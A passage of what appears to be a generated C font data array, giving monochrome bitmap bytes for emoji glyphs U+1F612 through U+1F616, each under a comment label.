0x0, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x83, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe1, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x71, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3c, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0x70, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0x38, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xb8, 0x0, 0x7f, 0xf8, 0x0,
0xff, 0xf0, 0x0, 0xfc, 0x0, 0x3f, 0xfc, 0x0,
0x7f, 0xf8, 0x0, 0x7e, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3d, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x38, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x8e, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x87, 0x0, 0x1f,
0xff, 0xff, 0xff, 0xf0, 0x1, 0xc1, 0xc0, 0xf,
0xff, 0xff, 0xff, 0xf8, 0x1, 0xc0, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x78, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x1c, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x70, 0x7, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x70, 0x3, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x78, 0x0, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x38,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x1e,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F612 "😒" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x83, 0x80, 0xf, 0x80, 0x0, 0x0,
0xfc, 0x0, 0xe1, 0xc0, 0x7f, 0xc0, 0x0, 0x0,
0x7f, 0xc0, 0x71, 0xc0, 0xfc, 0x0, 0x0, 0x0,
0x1, 0xf8, 0x3c, 0xe0, 0x70, 0x0, 0x0, 0x0,
0x0, 0x1e, 0xe, 0x70, 0x20, 0x0, 0x0, 0x0,
0x0, 0x2, 0x7, 0x38, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xb8, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xfc, 0x0, 0xf, 0xc0, 0x0,
0x1, 0xf8, 0x0, 0x7e, 0x0, 0x3f, 0xf8, 0x0,
0x7, 0xff, 0x0, 0x3f, 0x0, 0x3f, 0xfe, 0x0,
0x7, 0xff, 0xc0, 0x1f, 0x80, 0x1c, 0xff, 0x0,
0x3, 0x9f, 0xe0, 0xf, 0xc0, 0x0, 0x7f, 0x80,
0x0, 0xf, 0xf0, 0x7, 0xe0, 0x0, 0x3f, 0xc0,
0x0, 0x7, 0xf8, 0x3, 0xf0, 0x0, 0xf, 0xc0,
0x0, 0x1, 0xf8, 0x1, 0xf8, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x78, 0x0, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3d, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x38, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x8e, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x87, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc1, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0xe0, 0x0,
0x0, 0x3f, 0xc0, 0x0, 0x0, 0xe0, 0x78, 0x0,
0x0, 0xff, 0xfc, 0x0, 0x0, 0xe0, 0x1c, 0x0,
0x1, 0xf0, 0x1f, 0x80, 0x0, 0x70, 0x7, 0x0,
0x1, 0xe0, 0x1, 0xe0, 0x0, 0x70, 0x3, 0xc0,
0x0, 0xc0, 0x0, 0x60, 0x0, 0x78, 0x0, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x38,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x1e,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F613 "😓" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x6, 0x1, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x3, 0x87, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x3, 0xcf, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x3, 0xff, 0x0, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x1, 0x9e, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x1, 0xce, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x1, 0xc3, 0x80, 0x0, 0x0, 0x0, 0xf0,
0x0, 0x0, 0xe0, 0xe0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0xe0, 0x70, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0xe0, 0x1c, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x70, 0xf, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x70, 0x3, 0x80, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x38, 0x1, 0xe0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x18, 0x0, 0x70, 0x0, 0x0, 0x0,
0x3, 0xc0, 0x1c, 0x0, 0x38, 0x0, 0x0, 0x0,
0x0, 0xe0, 0xe, 0x0, 0xe, 0x0, 0x0, 0x0,
0x0, 0x38, 0x6, 0x0, 0x7, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7, 0x0, 0x3, 0x80, 0x0, 0x0,
0x0, 0x7, 0x3, 0x80, 0x1, 0xc0, 0x0, 0x0,
0x0, 0x3, 0x83, 0xc0, 0x0, 0xe0, 0x0, 0x0,
0x0, 0x0, 0xe1, 0xe0, 0x0, 0x70, 0x0, 0x0,
0x0, 0x0, 0x71, 0xf0, 0x0, 0x38, 0x0, 0x0,
0x0, 0x0, 0x3c, 0xfc, 0x0, 0x38, 0x0, 0x0,
0x0, 0x0, 0xe, 0x77, 0x0, 0x1c, 0x0, 0x0,
0x0, 0x0, 0x7, 0x39, 0x80, 0x1c, 0x0, 0x0,
0x0, 0x0, 0x3, 0xbc, 0xf0, 0x3c, 0x0, 0x0,
0x0, 0x0, 0x0, 0xfc, 0x1f, 0xfc, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7e, 0x3, 0xf8, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x1f, 0xf8,
0x0, 0xf, 0xfc, 0x0, 0x3f, 0x0, 0x7f, 0xff,
0x80, 0x1f, 0xff, 0x80, 0x3d, 0xc0, 0x1c, 0x3,
0x80, 0xe, 0x1, 0xc0, 0x1c, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x38, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x8e, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x87, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc1, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x38, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x1c, 0x0,
0x0, 0xf, 0xf0, 0x0, 0x0, 0x70, 0x7, 0x0,
0x0, 0x3f, 0xff, 0x0, 0x0, 0x70, 0x3, 0xc0,
0x0, 0xfc, 0x7, 0xe0, 0x0, 0x78, 0x0, 0xe0,
0x0, 0xf8, 0x0, 0xf8, 0x0, 0x38, 0x0, 0x38,
0x0, 0x30, 0x0, 0x18, 0x0, 0x38, 0x0, 0xe,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0xe, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F614 "😔" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0xf, 0x0, 0x10, 0x0, 0x0, 0x1,
0x0, 0x1c, 0x7, 0x0, 0x1c, 0x0, 0x0, 0x1,
0xc0, 0x7, 0x3, 0x80, 0x1e, 0x0, 0x0, 0x0,
0xf0, 0x3, 0x83, 0x80, 0x1e, 0x0, 0x0, 0x0,
0x3c, 0x0, 0xe1, 0xc0, 0x3e, 0x0, 0x0, 0x0,
0xf, 0x80, 0x71, 0xc0, 0x7e, 0x0, 0x0, 0x0,
0x3, 0xf0, 0x3c, 0xe0, 0x7c, 0x0, 0x0, 0x0,
0x0, 0x7c, 0xe, 0x70, 0x38, 0x0, 0x0, 0x0,
0x0, 0xe, 0x7, 0x38, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xb8, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xf8, 0x1, 0x80, 0x38,
0x0, 0xe0, 0x1c, 0x0, 0xfc, 0x0, 0xf0, 0x78,
0x0, 0x3c, 0x1e, 0x0, 0x7e, 0x0, 0x3f, 0xf8,
0x0, 0xf, 0xfe, 0x0, 0x3f, 0x0, 0x3, 0xf0,
0x0, 0x1, 0xf8, 0x0, 0x3d, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x38, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x8e, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x87, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc1, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x78, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x1c, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x70, 0x7, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x70, 0x3, 0xc0,
0x0, 0x7f, 0xff, 0xc0, 0x0, 0x78, 0x0, 0xe0,
0x0, 0x3f, 0xff, 0xe0, 0x0, 0x38, 0x0, 0x38,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x1e,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F615 "😕" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x83, 0x80, 0x0, 0xf0, 0x0, 0x3,
0xc0, 0x0, 0xe1, 0xc0, 0x0, 0xfc, 0x0, 0x3,
0xf0, 0x0, 0x71, 0xc0, 0x0, 0xff, 0x0, 0x3,
0xfc, 0x0, 0x3c, 0xe0, 0x0, 0x7f, 0x80, 0x1,
0xfe, 0x0, 0xe, 0x70, 0x0, 0x3f, 0xc0, 0x0,
0xff, 0x0, 0x7, 0x38, 0x0, 0x1f, 0xe0, 0x0,
0x7f, 0x80, 0x3, 0xb8, 0x0, 0xf, 0xf0, 0x0,
0x3f, 0xc0, 0x0, 0xfc, 0x0, 0x3, 0xf0, 0x0,
0xf, 0xc0, 0x0, 0x7e, 0x0, 0x0, 0xf0, 0x0,
0x3, 0xc0, 0x0, 0x3f, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3d, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0xe0, 0x0, 0x0,
0x1, 0xff, 0x80, 0x0, 0xe, 0x70, 0x0, 0x0,
0xf, 0xff, 0xfc, 0x0, 0x7, 0x38, 0x0, 0x0,
0x1f, 0x80, 0x3f, 0x80, 0x7, 0x8e, 0x0, 0x0,
0x3e, 0x0, 0x3, 0x80, 0x3, 0x87, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x1, 0xc1, 0xc0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x1, 0xc0, 0xe0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x78, 0x0,
0x70, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x1c, 0x0,
0x30, 0x0, 0x0, 0x0, 0x0, 0x70, 0x7, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x70, 0x3, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x78, 0x0, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x38,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x1e,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F616 "😖" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x83, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe1, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x71, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3c, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0x70, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0x38, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xb8, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xfc, 0x0, 0x60, 0x0, 0x0,
0x0, 0xc, 0x0, 0x7e, 0x0, 0x7c, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x3f, 0x0, 0xf, 0x80, 0x0,
0x0, 0x3e, 0x0, 0x1f, 0x80, 0x1, 0xf0, 0x0,
0x0, 0x7c, 0x0, 0xf, 0xc0, 0x0, 0x7e, 0x0,
0x0, 0xfc, 0x0, 0x7, 0xe0, 0x0, 0xf, 0xc0,
0x0, 0xf8, 0x0, 0x3, 0xf0, 0x0, 0x1, 0xf0,
0x1, 0xf0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0xfe,
0x3, 0xf8, 0x0, 0x0, 0xfc, 0x0, 0x3, 0xfc,
0x0, 0x7f, 0x80, 0x0, 0x7e, 0x0, 0xf, 0xf0,
0x0, 0x7, 0xf8, 0x0, 0x3f, 0x0, 0x3f, 0xc0,
0x0, 0x0, 0x7f, 0x80, 0x3d, 0xc0, 0x1f, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x1c, 0xe0, 0x4, 0x0,
0x0, 0x0, 0x0, 0x40, 0xe, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x38, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x8e, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x87, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc1, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0xe0, 0x0,
0x0, 0x80, 0x20, 0x0, 0x0, 0xe0, 0x78, 0x0,
0x0, 0xe0, 0x38, 0x0, 0x0, 0xe0, 0x1c, 0x0,
0xc0, 0xf8, 0x3e, 0x6, 0x0, 0x70, 0x7, 0x0,
0xf1, 0xee, 0x3b, 0xc7, 0x80, 0x70, 0x3, 0xc0,
0x3d, 0xe3, 0xb8, 0xf7, 0x80, 0x78, 0x0, 0xe0,
0xf, 0xe0, 0xf8, 0x3f, 0x80, 0x38, 0x0, 0x38,
